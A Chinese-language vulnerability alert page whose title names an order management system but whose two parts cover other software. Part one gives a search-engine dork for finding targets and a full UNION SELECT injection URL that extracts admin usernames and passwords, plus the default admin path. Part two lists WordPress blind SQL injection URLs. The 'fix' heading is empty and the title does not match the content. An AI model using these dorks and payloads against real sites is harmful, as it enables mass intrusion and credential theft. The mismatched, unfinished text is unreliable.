小朱订单管理系统的一个注入漏洞预警(精选2篇)
小朱订单管理系统的一个注入漏洞预警 篇1
华讯网络管理系统存在SQL注入,可获取管理员用户密码信息,
关键字:inurl:chk_case.asp
漏洞测试:
www.site.com/chk_case.asp?ID=673%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,userpassword,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41%20from%20admin
默认后台:
www.site.com/admin/
小朱订单管理系统的一个注入漏洞预警 篇2
get_terms过滤器文件中声明taxonomy.php 没有正确验证用户输入,允许攻击者构建任意sql命令,可用于盲注,
以下网址可用于执行SQL盲注攻击
[SQL injection] sql注入
localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL
injection]&order=[SQL injection]
localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL
injection]&order=[SQL injection]
localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL
injection]&order=[SQL injection]
第二个:
get_bookmarks()函数中声明的
bookmark.php文件没有正确验证用户输入
这个也可以盲注
以下网址可用于执行SQL盲注攻击
localhost/wp-admin/link-manager.php?orderby=[SQLinjection]&order=[SQL injection]
WordPress已经确认漏洞存在了
漏洞解决: